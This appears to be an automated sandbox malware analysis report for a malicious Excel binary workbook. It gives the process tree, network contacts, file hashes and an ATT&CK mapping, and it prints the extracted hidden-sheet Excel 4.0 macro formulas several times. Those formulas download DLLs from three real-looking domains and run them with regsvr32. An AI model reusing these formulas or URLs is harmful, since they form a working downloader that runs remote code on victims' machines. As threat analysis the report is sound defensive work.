Windows
Analysis Report
W-938893460.xlsb
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- EXCEL.EXE (PID: 1056 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  - regsvr32.exe (PID: 1036 cmdline: regsvr32 C:\Uduw\ehxw1.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  - regsvr32.exe (PID: 1424 cmdline: regsvr32 C:\Uduw\ehxw2.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  - regsvr32.exe (PID: 1696 cmdline: regsvr32 C:\Uduw\ehxw3.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
System Summary
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Source: | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": |
Source: | File opened: |
Source: | HTTPS traffic detected: (3 entries) |
Software Vulnerabilities
Source: | Process created: |
Source: | Section loaded: |
Source: | TCP traffic: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: (3 entries) |
Source: | JA3 fingerprint: |
Source: | IP Address: (2 entries) |
Source: | Network traffic detected: (6 entries) |
Source: | File created: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: (3 entries) |
Source: | HTTPS traffic detected: (3 entries) |
System Summary
Source: | Screenshot OCR: (10 entries) |
Source: | Macro extractor: (6 entries) |
Source: | Initial sample: (12 entries) |
Source: | Macro extractor: (18 entries) |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: (4 entries) |
Source: | Key opened: |
Source: | Process created: (7 entries) |
Source: | File created: (2 entries) |
Source: | Classification label: |
Source: | File read: |
Source: | Window detected: |
Source: | Initial sample: (16 entries) |
Source: | Static file information: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Process created: |
Source: | Process information set: (16 entries) |
Source: | Thread sleep time: (3 entries) |
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 2 Scripting | Path Interception | 1 Process Injection | 1 Regsvr32 | OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 23 Exploitation for Client Execution | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Disable or Modify Tools | Security Account Manager | 2 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 13 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Virtualization/Sandbox Evasion | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Process Injection | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Scripting | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
natalespatagonia.cl | 192.185.17.132 | true | false | unknown | |
camarajocaclaudino.pb.gov.br | 162.241.62.76 | true | false | unknown | |
maramaabroo.com | 31.22.4.117 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | unknown | |
| false | unknown | |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
31.22.4.117 | maramaabroo.com | United Kingdom | | 34119 | WILDCARD-ASWildcardUKLimitedGB | false |
192.185.17.132 | natalespatagonia.cl | United States | | 46606 | UNIFIEDLAYER-AS-1US | false |
162.241.62.76 | camarajocaclaudino.pb.gov.br | United States | | 46606 | UNIFIEDLAYER-AS-1US | false |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 608746 |
Start date and time: | 2022-04-13 16:07:25 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | W-938893460.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.expl.evad.winXLSB@7/5@3/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, svchost.exe
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- VT rate limit hit for: W-938893460.xlsb
Time | Type | Description |
---|---|---|
16:08:44 | API Interceptor |
Match | Associated samples (count) | Detection |
---|---|---|
31.22.4.117 | 15 | malicious |
192.185.17.132 | 15 | malicious |
Match | Associated samples (count) | Detection |
---|---|---|
camarajocaclaudino.pb.gov.br | 9 | malicious |
natalespatagonia.cl | 14 | malicious |
maramaabroo.com | 14 | malicious |
Match | Associated samples (count) | Detection |
---|---|---|
UNIFIEDLAYER-AS-1US | 20 | malicious |
WILDCARD-ASWildcardUKLimitedGB | 20 | malicious |
Match | Associated samples (count) | Detection |
---|---|---|
7dcce5b76c8b17472d024758970a406b | 20 | malicious |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9B874A.emf
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6144552 |
Entropy (8bit): | 2.9572715976810535 |
Encrypted: | false |
SSDEEP: | 6144:D6u5tA6lAx6k/X6xL/d4EXvTmOAMamGMW1B6u5tA6lAx6k/X6xL/d4EXvTmOAMa5:DX/AMq15X/AMq1t |
MD5: | 523C247BCEF4FF8747015C252C8A9029 |
SHA1: | CF123936AEEDD0B1EE9FCD80A93F0D5DB671E10D |
SHA-256: | 3F0F6BB70F3D65DCC8D248D78AC320BCC22B1148EA5FDD2C1043065D03460133 |
SHA-512: | 7C91E2482EA91925D0773E7E23A02F7E1CDD2CF43E5EA6FDA9FA82697E34DF519F14146E383AF10BA1980B059FACEF28BE67C55CC32DD04DE9702EBC84BF4482 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2075AC3.jpg
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 214051 |
Entropy (8bit): | 7.738874694802587 |
Encrypted: | false |
SSDEEP: | 3072:Yaz6kqB/EsWcXCJGbtyntvHGiYMnIOwKSIYFUQRLmTDBwszHbcOQafZD/:A5nRXCw+DnIdFUKmTDBwsz7c1yD/ |
MD5: | 0F96E1C9A4BCCA8DB381A2316A435575 |
SHA1: | D480958CC7D25185BC7B762496701C1A47A15B22 |
SHA-256: | E2A3213A6690EFEDE67D20432F756BFC53FE6FCB1F14A4B1B64BC9A72E11BD94 |
SHA-512: | 19045F11C973BF947E18970E662982062B694AD43F0F6C62F756F39B3AB2A341505C209EBFE2A1AA5E682AA21A727DE95F407AB458CD2B39EEEACEB5E0D8D480 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 1.1464700112623651 |
Encrypted: | false |
SSDEEP: | 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X |
MD5: | 72F5C05B7EA8DD6059BF59F50B22DF33 |
SHA1: | D5AF52E129E15E3A34772806F6C5FBF132E7408E |
SHA-256: | 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164 |
SHA-512: | 6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9273344 |
Entropy (8bit): | 2.958637995674597 |
Encrypted: | false |
SSDEEP: | 6144:u6u5tA6lAx6k/X6xL/d4EXvTmOAMamGMW1U6u5tA6lAx6k/X6xL/d4EXvTmOAMat:uX/AMq1cX/AMq1cX/AMq1 |
MD5: | 79603B730C3DACD515209EDC2F631D38 |
SHA1: | 534674A86BD510BA26F9FCB6E9E4014F5107728D |
SHA-256: | 7A3B725A4D2DC6EFB09F8A67F74781B9738AED04DC919997544296B9CC404316 |
SHA-512: | 4E72574955290863ED1390FD2476AB9FA290CC5BE4797F22CB320313880BD402B326EB4BD887F6E3278CFE6547E68F093BE0DE14E992E1862E8D553CFD06EEA0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.951344840556028 |
TrID: | |
File name: | W-938893460.xlsb |
File size: | 1057585 |
MD5: | 899517f64b531fa84462eb53bd071b50 |
SHA1: | 16fa83c16a17cc47bfd5424d60084bf70e2ce266 |
SHA256: | 1d7c459e0c8e7201933dec1ae217ba4f148838aca3ad10f9e2ba869d50e57e49 |
SHA512: | d9e63735b54948e82adabc9cb357d98cb058e6e0dbb940649785e9d288e6503472c7ce114b2eb19c77eda3bb205721c844c40ba9eec4ce828cfe560597a3313d |
SSDEEP: | 24576:O9vBKAnpis3QXPH5sjl+opcMrAm9vBKAnpis3Q+9vBKAnpis3QSVLFUN:C5KA65VSrX5KAV5KAVNFK |
TLSH: | 1A25F155A9690121D4FD313932008E409723384E90A4FDDE1E9B2EFF7B99978AC25BFC |
File Content Preview: | PK..........!.7.^*....^.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
Icon Hash: | e4e2ea8aa4b4b4b4 |
Document Type: | OpenXML |
Number of OLE Files: | 3 |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2022-04-13T08:02:18Z |
Creating Application: | |
Security: | 0 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
General | |
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 77 |
Entropy: | 2.95477953387 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x1Ole |
File Type: | data |
Stream Size: | 101 |
Entropy: | 3.4182168343 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00 |
General | |
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 3072068 |
Entropy: | 2.9569834776 |
Base64 Encoded: | True |
Data ASCII: | @ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | pre |
Row | Col | Formula |
---|---|---|
9 | 7 | =FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23) |
26 | 7 | =GOTO(PDGLGF!D3) |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | post |
Row | Col | Formula |
---|---|---|
4 | 3 | =FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16) |
13 | 3 | =EXEC("regsvr32 C:\Uduw\ehxw3.dll") |
15 | 3 | =RETURN() |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | pre |
Row | Col | Formula |
---|---|---|
4 | 3 | =FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | post |
Row | Col | Formula |
---|---|---|
12 | 3 | =CHAR(Fhgyk!L52) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | pre |
Row | Col | Formula |
---|---|---|
12 | 3 | =CHAR(Fhgyk!L52) |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | post |
Row | Col | Formula |
---|---|---|
9 | 7 | =FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23) |
12 | 7 | =CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0) |
14 | 7 | =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0) |
16 | 7 | =EXEC("regsvr32 C:\Uduw\ehxw1.dll") |
18 | 7 | =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0) |
20 | 7 | =EXEC("regsvr32 C:\Uduw\ehxw2.dll") |
22 | 7 | =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0) |
26 | 7 | =GOTO(PDGLGF!D3) |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2022-04-13T08:02:18Z |
Creating Application: | |
Security: | 0 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
General | |
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 77 |
Entropy: | 2.95477953387 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x1Ole |
File Type: | data |
Stream Size: | 101 |
Entropy: | 3.4182168343 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00 |
General | |
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 3072068 |
Entropy: | 2.9569834776 |
Base64 Encoded: | True |
Data ASCII: | @ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | pre |
Row | Col | Formula |
---|---|---|
9 | 7 | =FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23) |
26 | 7 | =GOTO(PDGLGF!D3) |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | post |
Row | Col | Formula |
---|---|---|
4 | 3 | =FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16) |
13 | 3 | =EXEC("regsvr32 C:\Uduw\ehxw3.dll") |
15 | 3 | =RETURN() |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | pre |
Row | Col | Formula |
---|---|---|
4 | 3 | =FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | post |
Row | Col | Formula |
---|---|---|
12 | 3 | =CHAR(Fhgyk!L52) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | pre |
Row | Col | Formula |
---|---|---|
12 | 3 | =CHAR(Fhgyk!L52) |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
Stage: | post |
Row | Col | Formula |
---|---|---|
9 | 7 | =FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23) |
12 | 7 | =CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0) |
14 | 7 | =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0) |
16 | 7 | =EXEC("regsvr32 C:\Uduw\ehxw1.dll") |
18 | 7 | =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0) |
20 | 7 | =EXEC("regsvr32 C:\Uduw\ehxw2.dll") |
22 | 7 | =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0) |
26 | 7 | =GOTO(PDGLGF!D3) |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2022-04-13T08:02:18Z |
Creating Application: | |
Security: | 0 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
General | |
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 77 |
Entropy: | 2.95477953387 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x1Ole |
File Type: | data |
Stream Size: | 101 |
Entropy: | 3.4182168343 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00 |
General | |
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 3072068 |
Entropy: | 2.9569834776 |
Base64 Encoded: | True |
Data ASCII: | @ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
